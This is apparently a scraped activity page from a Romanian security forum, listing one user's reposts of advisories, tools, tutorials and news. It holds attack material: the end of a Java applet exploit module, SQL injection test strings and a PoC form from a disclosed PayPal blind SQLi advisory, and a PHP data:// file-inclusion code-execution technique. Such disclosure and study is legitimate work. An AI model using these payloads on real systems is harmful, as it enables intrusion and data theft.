send_not_found(cli) return end send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' }) else send_redirect(cli, get_resource() + '/', '') end end def generate_html html = %Q|<html><head><title>Loading, Please Wait...</title></head>| html += %Q|<body><center><p>Loading, Please Wait...</p></center>| html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">| html += %Q|</applet></body></html>| return html end end Sursa: Java Applet Method Handle Remote Code Execution ? Packet Storm
  10. Nytro
    Listener 2.2 Authored by Folkert van Heusden | Site vanheusden.com This program listens for sound. If it detects any, it starts recording automatically and also automatically stops when things become silent again. Download: http://packetstormsecurity.com/files/download/119719/listener-2.2.tgz Sursa: Listener 2.2 ? Packet Storm
  11. Nytro
    Si multi au primit bani pentru asta. Iar unii, mai perspicace, au ramas si au invatat cate ceva de pe aici.
  12. Nytro
    Mai bine sa vina multi si prosti, sa invete alaturi de noi, sa nu mai fie prosti.
  13. Nytro
    Crack Wpa2 Password Using Gerix Description: In this video I will show you how to use gerix tool for cracking WPA2 key. Gerix tool is not fully automated tool but it is almost automated, if you know what next should be done so this tool is very good for wifi cracking this tool will save your time from typing. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Crack Wpa2 Password Using Gerix
  14. Nytro
    Paypal Bug Bounty #18 - Blind SQL Injection Vulnerability From: Vulnerability Lab <research () vulnerability-lab com> Date: Tue, 22 Jan 2013 16:26:56 +0100 Title: ====== Paypal Bug Bounty #18 - Blind SQL Injection Vulnerability Date: ===== 2013-01-22 References: =========== http://www.vulnerability-lab.com/get_content.php?id=673 http://news.softpedia.com/news/PayPal-Addresses-Blind-SQL-Injection-Vulnerability-After-Being-Notified-by-Experts-323053.shtml VL-ID: ===== 673 Common Vulnerability Scoring System: ==================================== 8.3 Introduction: ============= PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards. The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer to their bank account. PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale, Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across Europe, PayPal also operates as a Luxembourg-based bank. On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010. Between December 4ñ9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation for PayPal s decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables. (Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal] Abstract: ========= The Vulnerability Laboratory Research Team discovered a critical Web Vulnerability in the official Paypal ecommerce website application. Report-Timeline: ================ 2012-08-01: Researcher Notification & Coordination 2012-08-01: Vendor Notification 2012-08-07: Vendor Response/Feedback #1 2012-08-07: Vendor Response/Feedback #2 2012-12-04: Vendor Response/Feedback #3 2013-01-12: Vendor Fix/Patch 2013-01-22: Public Disclosure Status: ======== Published Affected Products: ================== PayPal Inc Product: Core Application 2012 Q4 Exploitation-Technique: ======================= Remote Severity: ========= Critical Details: ======== A blind SQL Injection vulnerability is detected in the official Paypal ecommerce website application. The vulnerability allows remote attackers or local low privileged application user account to inject/execute (blind) own sql commands on the affected application dbms. The vulnerability is located in the Confirm Email module with the bound vulnerable id input field. The validation of the confirm number input field is watching all the context since the first valid number matches. The attacker uses a valid number and includes the statement after it to let both pass through the paypal application filter. The result is the successful execution of the sql command when the module is processing to reload the page module. Exploitation of the vulnerability requires a low privileged application user account to access the website area and can processed without user interaction. Successful exploitation of the vulnerability results in web application or module compromise via blind sql injection attack. Vulnerable Service(s): [+] Paypal Inc - Core Application (www.paypal.com) Vulnerable Module(s): [+] Confirm Email Vulnerable Section(s): [+] Confirm Number (Verification) - Input Field Vulnerable Parameter(s): [+] login_confirm_number_id - login_confirm_number Proof of Concept: ================= The blind sql injection vulnerability can be exploited by remote attackers with low privileged application user account and without required user interaction. For demonstration or reproduce ... URL1: Request a Session with 2 different mails (Step1) https://www.paypal.com/de/ece/cn=06021484023174514599&em=admin () vulnerabiliuty-lab com https://www.paypal.com/de/ece/cn=06021484023174514599&em=01x445 () gmail com URL2: Injection into ID Confirm Field (Step2) https://www.paypal.com/de/cgi-bin/webscr?cmd=_confirm-email-password-submit&; dispatch=5885d80a13c0db1f8e263663d3faee8d7283e7f0184a5674430f290db9e9c846 1. Open the website of paypal and login as standard user with a restricted account 2. Switch to the webscr > Confirm Email module of the application 3. Request a login confirm id when processing to load a reset 4. Take the valid confirm number of the mail and insert it into the email confirm number verification module input fields 5. Switch to the last char of the valid confirm number in the input field and inject own sql commands as check to proof the validation Test Strings: -1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1-1' -1'+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1--1' 1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1 1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=-1' 6. Normally the website with the generated ID confirm button is bound to the standard template. 7. Inject substrings with the id -1+sql-query to proof for blind injections in the input field 8. The bottom bar gets loaded as result for the successful executed sql query 8. Now, the remote attacker can manipulate the paypal core database with a valid confirm number + his own sql commands Bug Type: Blind SQL INJECTION [POST] Injection Vulnerability SESSION: DE - 22:50 -23:15 (paypal.com) Browser: Mozilla Firefox 14.01 PoC: <form method="post" action="https://www.paypal.com/de/cgi-bin/webscr?cmd=_confirm-email-submit&; dispatch=5885d80a13c0db1f8e263663d3faee8d7283e7f0184a5674430f290db9e9c846" class=""> <p class="group"><label for="login_confirm_number_id"><span class="labelText"><span class="error"> Please enter it here</span></span></label><span class="field"><input id="login_confirm_number_id" class="xlarge" name="login_confirm_number" value="06021484023174514599-1+[BLIND SQL-INJECTION!]--" type="text"></span></p><p class="buttons"> <input name="confirm.x" value="Confirm" class="button primary" type="submit"></p><input name="form_charset" value="UTF-8" type="hidden"></form> Note: Do all requests ever with id to reproduce the issue. (-) is not possible as first char of the input request. Example(Wrong): -1+[SQL-Injection]&06021484023183514599 Example(Right): 06021484023183514599-1+[SQL-Injection]-- Example(Right): 06021484023183514599-1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1-1'-1'-- Test Mail(s): [+] 01x221 () gmail com and admin () vulnerability-lab com Note: After inject was successful 2 times because of my check, the paypal website opened a security issue report message box as exception-handling. I included the details and information of my test and explained the issue and short time later it has been patched. Solution: ========= 2013-01-12: Vendor Fix/Patch Risk: ===== The security risk of the blind sql injection web vulnerability in the paypal core application is estimated as critical. Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm () vulnerability-lab com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin () vulnerability-lab com - support () vulnerability-lab com - research () vulnerability-lab com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin () vulnerability-lab com or support () vulnerability-lab com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: research () vulnerability-lab com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Sursa: http://seclists.org/fulldisclosure/2013/Jan/199
  15. Nytro
    Sa zicem doar ca sunt "ceva" mai mult de 300 activi...
  16. Nytro
    Peste 2000.
  17. Nytro
    Bla bla, ceva moralizator, bla bla, ceva multumiri... Threads: 58,954 Posts: 386,370 Members: 100,000
  18. Nytro
    [h=2]Kali Linux – A Teaser into the Future.[/h]Originally, BackTrack Linux was developed for our personal use but over the past several years, it has grown in popularity far greater than we ever imagined. We still develop BackTrack for ourselves because we use it every day. However, with growth and a huge user base, we have an obligation to ourselves, our users, and the open source community to create the best distribution we possibly can. With this in mind, about a year ago a bunch of us at Offensive Security started thinking about the future of BackTrack and brainstormed about the features and functionality we’d like to see in the next and future revisions. One of our main topics of conversation was the option of swapping out our custom development environment for a fully fledged Debian-compliant packaging and repository system. This seemed like a good idea at the time, but little did we know the world of hurt and pain we were getting ourselves into. This single decision concerning the future path of BackTrack brought with it so much power and flexibility that it has changed the face of our distribution. What’s happened in the past year? We have been quietly developing the necessary infrastructure and laying the foundation for our newest penetration testing distribution as well as building over 300 Debian compliant packages and swearing in 8 different languages. These changes brought with them an incredible amount of work, research and learning but are also leading us down the path to creating the best, and most flexible, penetration testing distribution we have ever built, dubbed “Kali”. BackTrack Reborn – Kali Linux Teaser from Offensive Security on Vimeo. So when is new version of BackTrack goodness hitting the internet? We wont tell, yet. After all, that *is* the definition of a “teaser”. All we can say for now, is that we are well on the way to completion, and hope to have our initial release out….soon. Sursa: Kali Linux – A Teaser into the Future.
  19. Nytro
    [h=1]Defrag Tools: #24 - WinDbg - Critical Sections[/h]By: Larry Larsen, Andrew Richards, Chad Beeder In this episode of Defrag Tools, Andrew Richards, Chad Beeder and Larry Larsen continue looking at the Debugging Tools for Windows (in particular WinDbg). WinDbg is a debugger that supports user mode debugging of a process, or kernel mode debugging of a computer. This installment goes over the commands used to diagnose a Critical Section hang in a user mode application. We start with an overview of the four synchronization primitives and then delve deep in to temporary hangs, orphaned Critical Sections and deadlocks. We use these commands: ~*k ~*kv ~ ~~[TID]s !cs !cs <pointer> !locks Make sure you watch Defrag Tools Episode #1 and Defrag Tools Episode #23 for instructions on how to get the Debugging Tools for Windows and how to set the required environment variables for symbols and source code resolution. Resources: Critical Section Objects Timeline: [01:00] - Hang types - CPU Looping, Temporary Hangs and Permanent Hangs [02:00] - Synchronization Objects - Event, Semaphore, Mutex, Critical Section [06:54] - Critical Sections [11:45] - Debugging a Hang [28:08] - Debugging an Orphan [32:40] - Debugging a Deadlock Video: http://channel9.msdn.com/Shows/Defrag-Tools/Defrag-Tools-24-WinDbg-Critical-Sections
  20. Nytro
    [h=1]Using PHP’s data:// stream and File Inclusion to execute code[/h]Posted on January 21, 2013 by infodox This is a reasonably old remote code execution trick that I was actually unaware of until recently, when I stumbled across it by accident. I have been heavily researching various ways to go from a file inclusion bug to a remote code execution bug, and this one really got me interested. As we previously mentioned in the I expect:// a shell post, you can use certain PHP streams to execute code via a file inclusion vulnerability. This one does not require any PHP extensions to be installed, unlike the expect:// trick, and relies solely on allow_url_include to be enabled, which sadly is becoming a rarity these days. How this works is simple. PHP has a data:// stream, which can decode and accept data. If you insert some PHP code into this stream and include() it, the code will be executed. Rather simple, and rather effective too. I will cover php://input in a follow up post, and then post my findings on abusing FindFirstFile. Essentially, instead of including /etc/passwd or a remote file, you simply include the following. data://text/plain;base64,PAYLOAD_GOES_HERE Where the payload is base64 encoded PHP code to be executed. I choose to base64 encode the payload to avoid some problems I ran into with whitespace and longer payloads. Now, obviously this would be no fun without a simple proof of concept tool to demonstrate the vulnerability. The following tool is under serious redevelopment at the moment, so it only spawns a bind shell at the moment. Next version will offer several payloads (I am working on a generic payload library for this kind of thing). Data:// shell to bindshell You can download the current version of the tool here: PHP data include exploit I will update that code later, might do a video once there is something worth watching. Sursa: Using PHP’s data:// stream and File Inclusion to execute code | Insecurety Research
  21. Nytro
    [h=3]iOS application security assessment: Sqlite data leakage [/h] Most of the iOS applications store sensitive information like usernames, passwords & transaction details, etc.. either permanently or temporarily on the iPhone to provide offline access for the user. In general, to store large and complex data, iOS applications use the Sqlite database as it offers good memory usage and speed access. For example, to provide offline access Gmail iOS application stores all the emails in a Sqlite database file in plain text format. Unencrypted sensitive information stored in a Sqlite file can be stolen easily upon gaining physical access to the device or the device backup. Also, if an entry is deleted, Sqlite tags the record as deleted but not purge them. So in case if an application temporarily stores and removes the sensitive data from a Sqlite file, deleted data can be recovered easily by reading the Sqlite Write Ahead Log. The below article explains on how to view Sqlite files and how to recover the deleted data from Sqlite files on the iPhone. For this exercise, I have created a demo application called CardInfo. CardInfo is a self signed application, so it can only be installed on a Jailbroken iPhone. The CardInfo demo application accepts any username & password, then collects the credit card details from the user and stores it in a Sqlite database. Database entries are deleted upon logout from the app. Steps to install the CardInfo application: 1. Jailbreak the iPhone. 2. Download CardInfoDemo,ipa file - Download link. 3. On the Windows, download the iPhone configuration utility – Download link. 4. Open the iPhone configuration utility and drag the CardInfoDemo.ipa file on to it. 5. Connect the iPhone to the windows machine using USB cable. Notice that the connected device is listed in the iPhone configuration utility. Select the device and navigate to Applications tab. It lists the already installed applications on the iPhone along with our CardInfo demo app. 6. Click on Install button corresponding to the CardInfo application. 7. It installs the CardInfo application on to the iPhone. When an application is installed on the iPhone, it creates a directory with an unique identifier under /var/mobile/Applications directory. Everything that is required for an application to execute will be contained in the created home directory. Steps to view CardInfo Sqlite files: 1. On the Jailbroken iPhone, install OpenSSH and Sqlite3 from Cydia. 2. On windows workstation, download Putty. Connect the iPhone and the workstation to the same Wi-Fi network. Note: Wi-Fi is required to connect the iPhone over SSH. If the Wi-Fi connection is not available SSH into the iPhone over USB. 3. Run Putty and SSH into the iPhone by typing the iPhone IP address, root as username and alpine as password. 4. Navigate to /var/mobile/Applications/ folder and identify the CardInfo application directory using ‘find . –name CardInfo’ command. On my iPhone CardInfo application is installed on the - /var/ mobile/Application/B02A125C-B97E-4207-911B-C136B1A08687/ directory. 5. Navigate to the /var/mobile/Application/B02A125C-B97E-4207-911B-C136B1A08687/ CardInfo.app directory and notice CARDDATABASE.sqlite3 database file. 6. Sqlite database files on a Jailbroken iPhone can be viewed directly using Sqlite3 command line client. View CARDDATABASE.sqlite3 and notice that CARDINFO table is empty. 7.On the iPhone, open CardInfo application and login (works for any username and password). 8. Enter credit card details and click on Save button. In the background, it saves the card details in the Sqlite database. 9. View CARDDATABASE.sqlite3 and notice that CARDINFO table contains the data (credit card details). 10. Logout from the application on the iPhone. In the background, it deletes the data from the Sqlite database. 11. Now view CARDDATABASE.sqlite3 and notice that CARDINFO table is empty. Steps to recover the deleted data from CardInfo Sqlite file: Sqlite database engine writes the data into Write Ahead Log before storing it in the actual database file, to recover from system failures. Upon every checkpoint or commit, the data in the WAL is written into the database file. So if an entry is deleted from the Sqlite database and there is no immediate commit query, we can easily recover the deleted data by reading the WAL. In case of iOS, strings command can be used to print the deleted data from a Sqlite file. In our case, running ‘strings CARDDATABASE.sqlite3’ command prints the deleted card details. In iOS, if an application uses the Sqlite database for temporary storage, there is always a possibility to recover the deleted temporary data from the database file. For better security, use custom encryption while storing the sensitive data in Sqlite database. Also, before deleting a Sqlite record, overwrite that entry with junk data. So even if someone tries to recover the deleted data from Sqlite, they will not get the actual data. About The Author This is a guest post written by Satishb3 - www.securitylearn.net.
  22. Nytro
    Using OpenSSL to encrypt messages and files on Linux 1. Introduction OpenSSL is a powerful cryptography toolkit. Many of us have already used OpenSSL for creating RSA Private Keys or CSR (Certificate Signing Request). However, did you know that you can use OpenSSL to benchmark your computer speed or that you can also encrypt files or messages? This article will provide you with some simple to follow tips on how to encrypt messages and files using OpenSSL. 2. Encrypt and Decrypt Messages First we can start by encrypting simple messages. The following command will encrypt a message "Welcome to LinuxCareer.com" using Base64 Encoding: $ echo "Welcome to LinuxCareer.com" | openssl enc -base64 V2VsY29tZSB0byBMaW51eENhcmVlci5jb20K The output of the above command is an encrypted string containing encoded message "Welcome to LinuxCareer.com". To decrypt encoded string back to its original message we need to reverse the order and attach -d option for decryption: $ echo "V2VsY29tZSB0byBMaW51eENhcmVlci5jb20K" | openssl enc -base64 -d Welcome to LinuxCareer.com The above encryption is simple to use, however, it lacks an important feature of a password, which should be used for encryption. For example, try to decrypt the following string with a password "pass": U2FsdGVkX181xscMhkpIA6J0qd76N/nSjjTc9NrDUC0CBSLpZQxQ2Db7ipd7kexj To do that use OpenSSL again with -d option and encoding method aes-256-cbc: echo "U2FsdGVkX181xscMhkpIA6J0qd76N/nSjjTc9NrDUC0CBSLpZQxQ2Db7ipd7kexj" | openssl enc -aes-256-cbc -d -a As you have probably already guessed, to create an encrypted message with a password as the one above you can use the following command: $ echo "OpenSSL" | openssl enc -aes-256-cbc -a enter aes-256-cbc encryption password: Verifying - enter aes-256-cbc encryption password: U2FsdGVkX185E3H2me2D+qmCfkEsXDTn8nCn/4sblr8= If you wish to store OpenSSL's output to a file instead of STDOUT simply use STDOUT redirection ">". When storing encrypted output to a file you can also omit -a option as you no longer need the output to be ASCII text based: $ echo "OpenSSL" | openssl enc -aes-256-cbc > openssl.dat enter aes-256-cbc encryption password: Verifying - enter aes-256-cbc encryption password: $ file openssl.dat openssl.dat: data To decrypt the openssl.dat file back to its original message use: $ openssl enc -aes-256-cbc -d -in openssl.dat enter aes-256-cbc decryption password: OpenSSL 3. Encrypt and Decrypt File To encrypt files with OpenSSL is as simple as encrypting messages. The only difference is that instead of the echo command we use the -in option with the actual file we would like to encrypt and -out option, which will instruct OpenSSL to store the encrypted file under a given name: $ openssl enc -aes-256-cbc -in /etc/services -out services.dat To decrypt back our services file use: $ openssl enc -aes-256-cbc -d -in services.dat > services.txt enter aes-256-cbc decryption password: [B] 4. Encrypt and Decrypt Directory In case that you needed to use OpenSSL to encrypt an entire directory you would, firs,t need to create gzip tarball and then encrypt the tarball with the above method or you can do both at the same time by using pipe: # tar cz /etc | openssl enc -aes-256-cbc -out etc.tar.gz.dat tar: Removing leading `/' from member names enter aes-256-cbc encryption password: Verifying - enter aes-256-cbc encryption password: To decrypt and extract the entire etc/ directory to you current working directory use: # openssl enc -aes-256-cbc -d -in etc.tar.gz.dat | tar xz enter aes-256-cbc decryption password: The above method can be quite useful for automated encrypted backups. 5. Conclusion What you have just read was a basic introduction to OpenSSL encryption. When it comes to OpenSSL as an encryption toolkit it literally has no limit on what you can do. To see how to use different encoding methods see OpenSSL manual page: $ man openssl Make sure you tune in to our Linux jobs portal to stay informed about the latest opportunities in the field. Also, if you want to share your experiences with us or require additional help, please visit our Linux Forum. About Author: [TABLE] [TR] [TD][/TD] [TD] Lubos Rendek In the past I have worked for various companies as a Linux system administrator. Linux system has become my passion and obsession. I love to explore what Linux & GNU/Linux operating system has to offer and share that knowledge with everyone without obligations.[/TD] [/TR] [/TABLE] Sursa: Using OpenSSL to encrypt messages and files
  23. Nytro
    DNSChef 0.2.1 Authored by Peter Kacherginsky | Site thesprawl.org DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka "Fake DNS") is a tool used for application network traffic analysis among other uses. For example, a DNS proxy can be used to fake requests for "badguy.com" to point to a local machine for termination or interception instead of a real host somewhere on the Internet. Download: http://packetstormsecurity.com/files/download/119681/dnschef-0.2.1.tar.gz Sursa: DNSChef 0.2.1 ? Packet Storm
  24. Nytro
    Plug-in pwning challenge brings Pwn2Own prizes to $US560K From: InfoSec News <alerts () infosecnews org> Date: Tue, 22 Jan 2013 00:19:44 -0600 (CST) Plug-in pwning challenge brings Pwn2Own prizes to $US560k • The Register By Iain Thomson in San Francisco The organizers of the Pwn2Own hacking competition held at the annual CanSecWest security conference have upped the prize pool to $US560,000 and will now be offering prizes for hacking web plug-ins from Adobe and Oracle. The contest, which dropped mobile phone hacking last year, has added web plug-in hacking to the prize pool. Contestants get $70,000 apiece for cracking Adobe Reader and Flash, and $20,000 for getting past Java. Based on the latter's recent parlous performance in the security arena that price discount seems justified. "We've added browser plug-ins as a reflection of their increasing popularity as an attack vector," said Brian Gorenc, manager of vulnerability research at Pwn2Own sponsors HP DVLabs. "We want to demonstrate new hacking areas and design new mitigation techniques." For the more traditional hacks against browsers, a working Chrome exploit for Windows 7 will net $100,000, with the same again for an IE10 hack in Windows 8 or $75,000 for breaking IE9 in Windows 7. A Safari exploit in OSX Mountain Lion is worth $65,000 and Firefox on Windows 7 just $60,000, and all hacks must be completed in a 30 minute time frame. Sursa: Information Security News: Plug-in pwning challenge brings Pwn2Own prizes to $US560K
  25. Nytro
    [h=1]US Army to Hackers: If You Commit a Crime Against Us, We Will Find You[/h]January 12th, 2013, 18:01 GMT · By Eduard Kovacs Over the past period, the US government has invested a lot of resources to make sure that the country’s networks are protected against cybercriminals. When it comes to the US Army, the Criminal Investigation Command’s Computer Crimes Investigative Unit (CCIU) is the one that handles the threats from cyberspace. “CCIU is the U.S. Army's sole entity for conducting worldwide criminal investigations of computer intrusions and related national security threats affecting U.S. Army computers, networks, data and personnel,” Special Agent Daniel Andrews, the director of CCIU, explained. “Intruders range from non-malicious hackers to those intent upon disrupting a network or website, to foreign intelligence probes, so that makes our mission extremely important not just for CID, but the United States Army.” Andrews says that their investigations have led to the arrests of soldiers, civilians and foreign nationals from all over the world. “Regardless of where a crime is committed or the judicial venue in which it's prosecuted, if you commit a crime against the Army, we will find you and bring you to justice,” Andrews said. A perfect example of the CCIU’s capabilities is the case of the Romanian hacker known as TinKode, who attempted to breach the systems of various US organizations, including the Army and NASA. The CCIU managed to stop him from gaining access, and pushed on with the investigation to ensure that the attacker would be brought to justice. Despite the fact that they couldn’t get the case prosecuted in the United States, they were able to prosecute the hacker in Romania in collaboration with their international law enforcement partners. “Just because a person commits the crime overseas doesn't mean that our investigation stops or that justice won't be carried out. We simply adapt to ensure that in the end, justice is served,” Andrews explained. The head of the US Army’s CCIU is confident that no one can escape them. “As the Army continues to move forward by incorporating technology into all aspects of operations, they will become a target of opportunity for cyber criminals. But we will be here to stop them, dead in their tracks,” Andrews concluded. Sursa: US Army to Hackers: If You Commit a Crime Against Us, We Will Find You - Softpedia
×
×
  • Create New...